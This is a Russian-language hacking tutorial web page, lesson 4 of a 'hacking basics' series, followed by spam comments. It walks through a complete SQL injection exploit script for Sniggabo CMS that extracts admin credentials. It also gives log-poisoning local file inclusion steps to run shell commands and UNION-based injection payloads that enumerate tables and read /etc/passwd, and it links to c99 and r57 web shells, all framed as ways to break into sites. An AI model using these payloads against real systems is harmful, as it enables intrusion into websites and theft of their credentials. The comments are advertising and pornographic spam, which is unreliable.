Приветствую Вас Гость!
Суббота, 18.05.2024, 23:39
Главная | Регистрация | Вход | RSS

Меню сайта

Категории раздела

Друзья сайта

Посетители Сайта

Форма входа

Поиск

Облако Тегов

Статистика


Онлайн всего: 1
Гостей: 1
Пользователей: 0

Каталог статей

Главная » Статьи » Мои статьи

Основы Хакерства. Урок№4

Здравствуйте уважаемые посетители портала. Вы читаете 4 урок из серии «Основы хакерства». А вот что мы сегодня разберем:

  • Методы определения версии движка сайта/форума
  • ReversIP и полезные инструменты.
  • Разбираем сплоит.
  • Более углубленное знакомство с SQL injection php include
  • Прогулка по багтракам.


Методы определения версии движка
Вообще при анализе сайта, нужно сразу смотреть есть ли там паблик скрипты(т.е. не самописные)
Что бы найти и использовать эксплоит, нужно как минимум узнать имя и версию CMS, форума или каких либо других скриптов
расположенных на сайте (фотогаллереи, новостные ленты и т.п.).

Бывает, что данные крутятся в подвале сайта. Но обычно от туда их убирают.
Гораздо более эффективный вариант это посмотреть исходный код страницы.

Для танкистов: что бы просмотреть исходник страницы нужно нажать на правую кнопку мыши и
выбрать «Исходный код страницы», или что то вроде того (в зависимости от браузера).


Итак, в исходнике сначала смотрим на текст заключенные в комментарии ([!-- --])
Как думаю понятно, это текст на странице не отображается. Там как раз могут быть указаны имя версия CMS, иногда можно найти мы
администрации и прочие вкусности.
В исходнике также можно найти ссылки на каскадные листы стилей (.css). В них иногда тоже можно кое-что найти.
Да, еще можно преднамеренно вызвать ошибку. Т.е. попробовать открыть несуществующую папку на сайте (что-то типа
www.site.us/gone/), вполне возможно, что сайт выплюнет полезную инфу.
Ну думаю тут ясно. Теперь поговорим о форумах:
Обычно, что за форум определить несложно. Сложнее узнать версию.

В phpbb например есть очень интересный файлик - CHANGELOG.html
Его, возможно обнаружить по пути

forum/docs/CHANGELOG.html


Там можно обнаружить надпись вроде

phpBB x.x.x Changelog


В IPB 1.3 присутствуют файлы ssi.php
show.php
В В 2.0.*
/sources/help.php
/sources/usercp.php
В 2.1.*
/ips_kernel/PEAR/

Ну и к тому же опять же нужно смотреть на исходный код и на ошибки.
Кстати, еще стоит сказать, что доверять баннерам в подвале не стоит. Умный администратор поставить фальшивую подпись.

Reverse IP и полезные инструменты.
Бывает, что сайт написан на чистом HTML без применения скриптов. Казалось бы, взломать его почти невозможно. Но это не так.
Выход-Reverse IP. Суть этой атаки в том, что бы взломать сайт,
который хостится на одном сервере с целевым сайтом (если такой
имеется). Либо наша цель получить root(права администратора) на сервере.
Тогда мы ищем, какие сайты хостятся на сервере и пытаемся
взломать один из них.
Ну думаю, суть понятна. Другое дело как узнать какие сайты присутствует на сервере.
Для этого мы будем использовать сканнеры.
Например, я пользуюсь вот этим онлайн сканером от madnet –a

http://madnet.name/tools/madss/

Так же он составляет примерную структуру сайта.
Вот еще неплохой

http://security-digger.org/

Тоже присутствует возможность составлять структуру директорий сайта, а также reverse ip.

Допустим, забиваем адрес www.job.ru
Сканер выдает нам соседние сайты.
Если речь пошла про онлайн тулзы приведу еще одну:

http://x3k.ru/

Здесь есть куча всяких кодировщиков и декодеровщиков (пригодиться нам при инъекциях),
так же есть сканер портов Reverse IP
whois сервис и еще несколько.
Кстати, если вы пользуетесь браузером firefox, то можете установить плагин Reverse IP

А плагин LiveHTTPHeaders поможет редактировать HTTP заголовки.


Разбираем сплоит.
Для тестирования желательно иметь в наличии интерпретатор php. Кажется, на 2 уроке я
советовал поставить тебе mysql+apache+php. Если ты уже поставил это и у тебя все работает стабильно то ок. Если не ставил,
советую установить Denwer
Процесс установки прост до безобразия. В состав входит все, что нам нужно. Тем более на следующем уроке я хотел бы показать
анализ одной CMS, так что Денвер просто необходим.
Мудрить не будем, и возьмем простой сплоит для Sniggabo CMS:

Sniggabo-expl.php
14 июня, 2009
print_r('

################################################

Sniggabo CMS - Remote SQL Injection Exploit

Date: 11.06.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Homepage: http://www.novusec.com
Greetz to: -=Player=- , Suicide, enco,
Palme, GPM, karamble, Free-Hack

Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id
Use: php '.$argv[0].' http://www.site.com

################################################

');
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)
+from+users--";
$src = file_get_contents($url);
$data = split("::",$src);
echo "Admin: $data[1]nPassword: $data[2]n";
?>

Во-первых обратим внимания на эту строку:

Use: php '.$argv[0].' http://www.site.com

В ней показано, как нужно использовать этот эксплоит.
Как видишь запускать его нужно из командно строки. В качестве параметра передаем сайт.
Далее сам код:

В 1 2 3 строке мы составляем url
$argv[1] – сайт, который мы передали в качестве параметра.
/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--"
; - собственно сам процесс получения логина и пароля.

Далее
$src = file_get_contents($url);

Обращаемся по составленному адресу и записываем результат в переменную $src
$data = split("::",$src);

Разделяем полученный результат по ключевой строке "::”
echo "Admin: $data[1]nPassword: $data[2]n";


Выводим.
Если мы будем раскручивать уязвимость вручную, то результат будет таким:
Login::password
В сплоите как раз по строке :: мы делим результат. В переменной первый элемент будет login а второй password.

Local PHP include и выполнение произвольного кода.
Сейчас мы поговорим, как через локальный инклуд мы сможем выполнить произвольный код.
Как ты помнишь с помощью этой уязвимости мы можем читать файлы на сервер. Так вот, значит мы сможем прочитать логи веб сервера. В логах сохраняются все запросы. Нас интересуют
httpd-access.log и httpd-error.log.
Суть в то, что бы подделать HTTP заголовок записан в поле User-Agent (например) php код. Далее это код запишется в логи, а логии мы можем загружать. Вот тебе и выполнение кода.
Во-первых как подделывать заголовки. Выше я приводил удобный плагин LiveHTTPHeaders. Если вы не пользуетесь Фоксом можно скачать программу InetCrack.
Итак, давайте попробуем забить в поле Referer такой код:



Все код записан в httpd-access.log. Теперь нужно с помощью инклуда подгрузить его.
Тут придется перебирать пути до логов.

Вот стандартные http://forum.hackzona.ru/forum-f8/thread-t13002.html

Ну допустим путь оказался таким:

../../../../../../etc/apache2/httpd.conf www.include.us/index.php?page= ../../../../../../etc/apache2/httpd.conf&cmd=ls


И мы получим листинг файлов текущей директории (ls).
Только учти, выполняется только тот код, который стоит первым в логах. Т.е. у нас будет только одна попытка, а потом по новой.

SQL injection.
Особенности 5 версии mysql
Что такое magic quotes
Как можно читать файлы с помощью инъекций.

До этого мы разбирали инъекции в mysql <5
В 5 версии есть кое-какие особенности.
Ну значит, с помощью команды version() мы узнали, что база данных версии 5 (or <)
В ней присутствует таблица INFORMATION_SCHEMA, в ней находятся таблицы и колонки базы. Она избавит нас от ручного подбора.
Реализация

www.site.us/index.php?id=1’
www.site.us/index.php?id=1,table_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES/*


И так тут либо мы увидим все таблицы базы либо только первую.
Если второе, то прочитать остальные имена можно с помощью limit:

www.site.us/index.php?id=+union+select+1,table_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES
+limit1,2/*


Читаем 2 запись.
Так, допустим нашли таблицу.
Теперь смотрим поля:

www.site.us/index.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS/*


Опять же просмотр конкретных записей:

www.site.us/index.php?id=+union+select+1,column_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+limit 1,2/*


Ну и ищем поля типа password или login

Теперь поговорим про магические кавычки (magic quotes)
это процесс, который позволяет автоматически экранировать входные данные PHP скрипта.
Если magic quotes=on (активны), то входящие одиночные и двойные кавычки, левый слеш и NULL знаки экранируются левыми слешами.
Волшебные кавычки бывают:

magic_quotes_gpc – проверяет запросы HTTP (GET, POST, и COOKIE)
magic_quotes_runtime – функции, которые возвращают данные из внешних источников будут экранироваться левыми слешами.
magic_quotes_sybase – одиночные кавычки экранируются двойными

Надеюсь понятно, что если magic_quotes = on нам это очень не на руку.

Скоро я расскажу, как это обходить.
А теперь как можно прочитать файл с помощью инъекции.
Т.е. мы получим тот же локальный php include
Ну допустим, есть инъект:

www.site.us/index.php?id=+union+select+1,2,3,4,5,6,7,8,9,10/*


Читабельно поле 2.
Загружать файлы можно так:

www.site.us/index.php?id=+union+select+1,LOAD_FILE(‘/etc/passwd’),4,5,6,7,8,9,10/*


Прогулка по багтракам. В этом топе я решил разбирать интересные (ну вообще какие будут) уязвимости с багтраков. Вообще я часто уже говорил, что чтение багтрак лент
идет только на пользу. Пожалуй приведу несколько:

Русскоязычные:
bugtraq.ru/
securitylab.ru/
securityvulns.ru/


Остальные:
milw0rm.com
packetstormsecurity.org
securityfocus.com



Приложение: Во-первых, как вы заметили я опустил раздел xss. На данном этапе пока не знаю что вам рассказывать, поэтому просто дам ссылку на интересную
статьюhttp://forum.antichat.ru/thread8038.html
Во вторых несколько ссылок на веб шеллы:

c99shellhttp://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt
AK-74 http://stranger.nextmail.ru/userban.txt
r57shell http://www.securitylab.ru/software/234092.php

Далее советую прочитать недавнюю статью kerny PHP – Include, и немного удачи.
ps не забываем что уголковые теги заменены на [ and ]




                                                                     



Источник: http://www.fssr.ru/index.php
Категория: Мои статьи | Добавил: Vovan (20.09.2010) | Автор: Vovan E W
Просмотров: 13310 | Комментарии: 76 | Теги: Уроки Хакерста, Основы Хакерства, Как стать Хакером, Хакер | Рейтинг: 0.0/0
Всего комментариев: 201 2 »
20 DudleyTor  
0
Hello dear friend, I would like to offer placement of your link (or links) on different platforms of the internet such as: forums, blogs, comments and much more. . .

Increase your Visibility Boost Your Seo Rank - Get Organic Traffic From Google. Ranking in Google isn’t hard. All you need is a healthy number of backlinks from referring domains that have authority and trust in Google’s eyes.

This Backlinks Service Benefits:

1. Easily get Google rankings

2. Get a lot of traffic from Google

3. You can earn from the website in different ways

4. Increase Domain Authority (DA)

Quality guaranteed !

PRICE - 20$

WebSite - https://goo.su/CHM5cJW

19 Robertrex  
0
Hello dear friend, I would like to offer placement of your link (or links) on different platforms of the internet such as: forums, blogs, comments and much more. . .

Increase your Visibility Boost Your Seo Rank - Get Organic Traffic From Google. Ranking in Google isn’t hard. All you need is a healthy number of backlinks from referring domains that have authority and trust in Google’s eyes.

This Backlinks Service Benefits:

1. Easily get Google rankings

2. Get a lot of traffic from Google

3. You can earn from the website in different ways

4. Increase Domain Authority (DA)

Quality guaranteed !

PRICE - 20$

WebSite - https://goo.su/ZUHZ

18 KevinCanty  
0
Hello dear friend, I would like to offer placement of your link (or links) on different platforms of the internet such as: forums, blogs, comments and much more. . .

Increase your Visibility Boost Your Seo Rank - Get Organic Traffic From Google. Ranking in Google isn’t hard. All you need is a healthy number of backlinks from referring domains that have authority and trust in Google’s eyes.

This Backlinks Service Benefits:

1. Easily get Google rankings

2. Get a lot of traffic from Google

3. You can earn from the website in different ways

4. Increase Domain Authority (DA)

Quality guaranteed !

PRICE - 10$

WebSite - http://traffic-for-your.site/

17 Aaavvvcz  
0
111

16 RaymondFarie  
0
Всем привет! Класный у вас сайт!
Нашёл интересное в сети:
http://enewz.ru/news/15201-roy-dzhons-mladshiy-prokommentiroval-svoy-proigrysh-foto.html [b] Рой Джонс-младший прокомментировал свой проигрыш (ФОТО) [/b]
http://enewz.ru/news/24120-neobyknovennyy-fashizm-belorusy-v-ato.html
http://enewz.ru/news/18004-pokrytie-futbolnyh-poley-v-britanii-mozhet-vyzyvat-onkologicheskie-zabolevaniya.html
Ещё много интересного по теме нашел тут: [b] [/b] http://enewz.ru/

15 Thomasinacy  
0
Dudes and dudettes, greetings, I just smell that people have alive discussion at this place.
I am looking for someone with an experience of MAKING MONEY ONLINE? I made some cash with ITUNES before but not much. My friend has suggested to buy a best website at 999webdesign.com (here is URL if you are lazy to type it, http://999webdesign.com/ - direct link - "MULTIPLE REVENUE STREAMS WEBSITES") - I hope it can work! It looks like they are making good MONEY MAKING SITES. please share your opinion and experience? I was not able to find a good looking
FREE AFFILIATE WEBSITE and 999webdesign.com sounds good. Thank you so much!

14 wegorGek  
0
Срочно требуются. Обработка зказов на дому.

Без вложений, на системе автоматического приёма и обработки заказов.

Оформление здесь >> obrabotka-zakazov.tk <<

13 Vincentma  
0
Сегодня вечером разглядывал контент интернет, вдруг к своему удивлению увидел интересный ресурс. Это он: http://mugiwara.ru/ - наруто. Для нас данный ресурс произвел незабываемое впечатление. Удачи!

12 rarpymnkavy  
0
порно зоофилы бесплатно http://sex-porn-tube.ru/ sextube

11 CoemaCore  
0
sexmultiki http://3sexporn.ru/ порнуха

1-10 11-20
Имя *:
Email *:
Код *: